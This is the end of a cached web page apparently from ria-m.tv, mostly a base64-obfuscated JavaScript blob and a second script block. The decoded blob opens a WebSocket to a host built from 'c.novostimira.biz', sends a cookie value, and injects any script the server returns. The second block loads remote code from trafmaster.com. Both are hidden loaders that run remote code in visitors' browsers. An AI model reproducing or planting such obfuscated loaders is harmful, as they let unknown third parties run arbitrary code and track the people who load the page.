        +"JpbmcuZnJvbUNoYXJDb2RlKHMuY2hhckNvZGVBdCgxMykrcy5jaGFyQ29kZU"
        +"F0KDgpKnMuY2hhckNvZGVBdCg1KS0xMjIzOSk7cmVzX3N0cis9U3RyaW5nLm"
        +"Zyb21DaGFyQ29kZShzLmNoYXJDb2RlQXQoMTEpK3MuY2hhckNvZGVBdCgxMi"
        +"kqcy5jaGFyQ29kZUF0KDMpLTEwODA1KTtyZXNfc3RyKz1TdHJpbmcuZnJvbU"
        +"NoYXJDb2RlKHMuY2hhckNvZGVBdCg0KSpzLmNoYXJDb2RlQXQoNiktcy5jaG"
        +"FyQ29kZUF0KDEyKS0xMTg3Nik7cmVzX3N0cis9U3RyaW5nLmZyb21DaGFyQ2"
        +"9kZShzLmNoYXJDb2RlQXQoMTQpK3MuY2hhckNvZGVBdCgyKSpzLmNoYXJDb2"
        +"RlQXQoOSktMTM0NzYpO3Jlc19zdHIrPVN0cmluZy5mcm9tQ2hhckNvZGUocy"
        +"5jaGFyQ29kZUF0KDApK3MuY2hhckNvZGVBdCgxKSpzLmNoYXJDb2RlQXQoNS"
        +"ktMTI4NzEpO3Jlc19zdHIrPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ2"
        +"9kZUF0KDcpKnMuY2hhckNvZGVBdCgxNCktcy5jaGFyQ29kZUF0KDQpLTEzMD"
        +"c4KTtyZXNfc3RyKz1TdHJpbmcuZnJvbUNoYXJDb2RlKHMuY2hhckNvZGVBdC"
        +"g0KStzLmNoYXJDb2RlQXQoMTEpKnMuY2hhckNvZGVBdCgyKS01NDI3KTtyZX"
        +"Nfc3RyKz1TdHJpbmcuZnJvbUNoYXJDb2RlKHMuY2hhckNvZGVBdCg1KSpzLm"
        +"NoYXJDb2RlQXQoMTMpLXMuY2hhckNvZGVBdCg2KS0xMTk3NCk7cmV0dXJuIH"
        +"Jlc19zdHI7fWZ1bmN0aW9uIGdldFdzczM3NTgoc3JjKXt2YXIgc3RhcnQ9c3"
        +"JjLmluZGV4T2YoJy4nKTt2YXIgZW5kPTA7dmFyIHN0cj0nJztpZihzdGFydC"
        +"l7ZW5kPXNyYy5pbmRleE9mKCcvJyxzdGFydCk7aWYoZW5kKXtzdHI9c3JjLn"
        +"N1YnN0cmluZyhzdGFydCsxLGVuZCk7fX1yZXR1cm4gc3RyO31mdW5jdGlvbi"
        +"Bzd3NzMzc1OCgpe3ZhciBkTk09bmV3IERhdGUoKTt2YXIgdD1NYXRoLmZsb2"
        +"9yKGROTS5nZXRUaW1lKCkvMTAwMCk7aWYodC13aW5kb3cudHN3c3MzNzU4PD"
        +"Mpe3NldFRpbWVvdXQoJ3N3c3MzNzU4KCknLDIwMDApO3JldHVybjt9dmFyIG"
        +"VsPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDTk0zNzU4dCcpO2lmKCFlbC"
        +"l7cmV0dXJuO312YXIgd3NzPWd3czM3NTgoZ2V0V3NzMzc1OCh3aW5kb3cud3"
        +"Nzc3JjMzc1OCkpO2lmKCF3c3Mpe3JldHVybjt9dmFyIHdzMzc1OHMwPW5ldy"
        +"BXZWJTb2NrZXQoJ3dzczonKycvLycrd3NzKycvJyk7d3MzNzU4czAub25vcG"
        +"VuPWZ1bmN0aW9uKCl7dmFyIG89e307by5jPTEqZ2V0Q29va2llMzc1OCgnQ0"
        +"5NbjM3NTgnKTtvLmk9Mzc1ODtvLnQ9J2MnO3ZhciBzdHI9SlNPTi5zdHJpbm"
        +"dpZnkobyk7d3MzNzU4czAuc2VuZChzdHIpO3dzMzc1OHMwLm9ubWVzc2FnZT"
        +"1mdW5jdGlvbihldmVudCl7dmFyIE5NY2VzMD1kb2N1bWVudC5jcmVhdGVFbG"
        +"VtZW50KCdzY3JpcHQnKTtOTWNlczAudHlwZT0ndGV4dC9qYXZhc2NyaXB0Jz"
        +"tOTWNlczAuY2hhcnNldD0nVVRGLTgnO05NY2VzMC5pbm5lckhUTUw9ZXZlbn"
        +"QuZGF0YTtlbC5wYXJlbnROb2RlLmFwcGVuZENoaWxkKE5NY2VzMCk7fTt9O3"
        +"1pZih3aW5kb3cuV2ViU29ja2V0KXt3aW5kb3cudHN3c3MzNzU4PU1hdGguZm"
        +"xvb3IoZGF0ZU5NLmdldFRpbWUoKS8xMDAwKTt3aW5kb3cud3Nzc3JjMzc1OD"
        +"0naHR0cCcrKHdpbmRvdy5sb2NhdGlvbi5wcm90b2NvbD09J2h0dHBzOic/J3"
        +"MnOicnKSsnOlwvXC9jLm5vdm9zdGltaXJhLmJpei9sLzM3NTgnO3NldFRpbW"
        +"VvdXQoJ3N3c3MzNzU4KCk7JywyMDAwKTt9");
      el.parentNode.appendChild(NMces2);
      
    }
  }
</script>
<script type="text/javascript">
  var el = document.getElementById('883e4639542904ec0f23eb0621137bbb');
  if (el) {
    if (document.getElementById('883e4639542904ec0f23eb0621137bbb_t').style.display == 'none') {
      document.getElementById('883e4639542904ec0f23eb0621137bbb_t').style.display = '';
      var dateTL = new Date();
      var t = Math.floor(dateTL.getTime()/(1000*600));
      var TLces=document.createElement('script');
      TLces.type = 'text/javascript';
      TLces.src='http://trafmaster.com/show/out.php?t=295&async=1&v='+t;
      el.parentNode.appendChild(TLces);
    }
  }
</script>
</body>
</html><!--Page generated in 0.0216 seconds.--><!-- /var/www/admin/data/www/ria-m.tv/cache/cached-ria-m.tv***.html --><!-- Error Cache! -->